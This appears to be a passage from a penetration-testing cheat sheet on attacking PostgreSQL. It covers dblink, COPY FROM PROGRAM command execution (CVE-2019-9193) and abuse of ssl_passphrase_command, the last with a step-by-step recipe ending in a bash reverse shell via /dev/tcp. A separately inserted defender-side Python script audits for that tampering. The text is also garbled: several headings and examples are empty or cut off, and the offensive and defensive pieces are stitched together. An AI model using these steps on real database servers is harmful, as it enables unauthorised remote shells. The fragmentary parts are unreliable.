dblink is a PostgreSQL module that offers several interesting options from the attacker's point of view. It can be used to connect to other PostgreSQL instances or to perform TCP connections. These functionalities, along with the COPY FROM functionality, can be used to escalate privileges, perform port scanning or grab NTLM challenge responses. You can read here how to perform these attacks.

dblink_connect

Members of the DEFAULT_ROLE_READ_SERVER_FILES group and superusers can use these methods on any path (check out convert_and_check_filename in genfile.c).

Note: copy cannot be used to write binary files as it modifies some binary values.

Metasploit module: multi/postgres/postgres_copy_from_program_cmd_exec
More information about this vulnerability here. While reported as CVE-2019-9193, PostgreSQL declared this was a feature and will not be fixed.

The relevant configuration attributes are:

ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Path to the private key of the database.

ssl_passphrase_command = ''
If the private key file is protected by a password (encrypted), PostgreSQL will execute the command indicated in this attribute.

ssl_passphrase_command_supports_reload = off
If this attribute is on, the command that is executed when the key is password protected will be executed when pg_reload_conf() is executed.

Steps, in order:

openssl rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
pg_reload_conf()
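As an added defender-side check (not part of the original page), this Python script parses a postgresql.conf and flags the three settings just described when they are arranged as above. The two config snippets are constructed samples, and treating a non-absolute-path command as suspicious is an assumption about what a legitimate passphrase supplier looks like.

```python
import re

# Constructed sample configs (not from a real host): the shipped defaults, then what the abuse leaves behind.
BASELINE_CONF = """
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
ssl_passphrase_command = ''
ssl_passphrase_command_supports_reload = off
"""
TAMPERED_CONF = """
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'   # key re-encrypted with a passphrase
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
"""

def parse_pg_conf(text: str) -> dict[str, str]:
    """Parse the postgresql.conf subset needed here: '#' comments, optional '=',
    single-quoted values ('' escapes a quote) and bare values; later assignments win."""
    settings: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^([A-Za-z_][A-Za-z0-9_.]*)\s*(?:=\s*|\s+)(.*)$", line)
        if not m:
            continue
        name, value = m.group(1).lower(), m.group(2)
        if value.startswith("'"):
            q = re.match(r"'((?:[^']|'')*)'", value)
            if not q:
                continue  # unterminated quote: skip the line
            value = q.group(1).replace("''", "'")
        else:
            value = value.split("#", 1)[0].strip()  # drop a trailing comment
        settings[name] = value
    return settings

def audit_passphrase_command(text: str) -> list[str]:
    """Findings for the ssl_passphrase_command abuse pattern described above."""
    s = parse_pg_conf(text)
    findings: list[str] = []
    cmd = s.get("ssl_passphrase_command", "")
    reload_on = s.get("ssl_passphrase_command_supports_reload", "off").lower() in ("on", "true", "yes", "1")
    if cmd:
        findings.append("ssl_passphrase_command is set: confirm it is the intended passphrase supplier")
        if not cmd.split()[0].startswith("/"):  # assumption: a real supplier is an absolute path
            findings.append("command is not an absolute path ('bash -c' and similar suggest tampering)")
        if reload_on:
            findings.append("supports_reload=on: the command also runs on every pg_reload_conf()")
    return findings
```

Running audit_passphrase_command over the live file (and comparing against a known-good copy) gives a cheap periodic check that the reload path has not been repurposed.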
Using CHR for basic clauses (character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc.; it does not work for all SQL statements):
$
These queries return the same results: